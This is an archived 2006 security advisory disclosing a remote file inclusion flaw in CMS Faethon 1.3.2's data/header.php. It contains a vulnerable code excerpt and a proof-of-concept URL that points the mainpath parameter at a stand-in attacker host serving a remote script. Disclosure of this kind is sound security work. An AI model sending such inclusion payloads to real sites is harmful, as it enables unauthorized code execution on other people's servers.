TUCoPS :: Web :: CMS / Portals :: b06-3089.htm

CMS Faethon 1.3.2 mainpath Remote File Inclusion
CMS Faethon 1.3.2 mainpath Remote File Inclusion
CMS Faethon 1.3.2 mainpath Remote File Inclusion



____________________   ___ ___ ________=0D
\_   _____/\_   ___ \ /   |   \\_____  \  =0D
 |    __)_ /    \  \//    ~    \/   |   \ =0D
 |        \\     \___\    Y    /    |    \=0D
/_______  / \______  /\___|_  /\_______  /=0D
        \/         \/       \/         \/ =0D
=0D
					.OR.ID=0D
ECHO_ADV_33$2006=0D
=0D
---------------------------------------------------------------------------=0D
[ECHO_ADV_33$2006] CMS Faethon 1.3.2 mainpath Remote File Inclusion=0D
---------------------------------------------------------------------------=0D
=0D
Author       : M.Hasran Addahroni a.k.a K-159=0D
Date         : June, 16th 2006=0D
Location     : Indonesia, Bali=0D
Web : http://advisories.echo.or.id/adv/adv33-K-159-2006.txt=0D 
Critical Lvl : Highly critical=0D
Impact       : System access=0D
Where        : From Remote=0D
---------------------------------------------------------------------------=0D
=0D
Affected software description:=0D
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=0D
CMS Faethon =0D
=0D
Application : CMS Faethon =0D
version     : 1.3.2=0D
URL : http://cmsfaethon.com/=0D 
Description :=0D
=0D
CMS Faethon is content management system for different web pages.=0D
=0D
---------------------------------------------------------------------------=0D
=0D
Vulnerability:=0D
~~~~~~~~~~~~~~~~=0D
=0D
in folder data we found vulnerability script header.php.=0D
=0D
-----------------------header.php----------------------=0D
....=0D
=0D
        

RSS - cmsfaethon.com

=0D
=0D 'http://cmsfaethon.com/feed/articles/rss2.php?LangSet=cs';=0D include($mainpath . 'rss-reader.php');=0D ?>=0D ...=0D ----------------------------------------------------------=0D =0D Variables $mainpath are not properly sanitized.When register_globals=on and allow_fopenurl=on an attacker can exploit this vulnerability with a simple php injection script.=0D =0D Proof Of Concept:=0D ~~~~~~~~~~~~~~~~~=0D =0D http://target.com/[cms_faethon_path]/data/header.php?mainpath=http://attacker.com/evil.txt?=0D =0D Solution:=0D ~~~~~~~~~=0D =0D sanitize variabel $mainpath in header.php=0D =0D =0D ---------------------------------------------------------------------------=0D Shoutz:=0D ~~~~~~~=0D ~ ping - my dearest wife, for all the luv the tears n the breath =0D ~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous,kaiten=0D ~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw=0D ~ sinChan,x`shell,tety,sakitjiwa, m_beben, rizal, cR4SH3R, metalsploit=0D ~ newbie_hacker@yahoogroups.com =0D ~ #aikmel #e-c-h-o @irc.dal.net=0D ---------------------------------------------------------------------------=0D Contact:=0D ~~~~~~~~=0D =0D K-159 || echo|staff || eufrato[at]gmail[dot]com=0D Homepage: http://k-159.echo.or.id/=0D =0D -------------------------------- [ EOF ] ----------------------------------=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH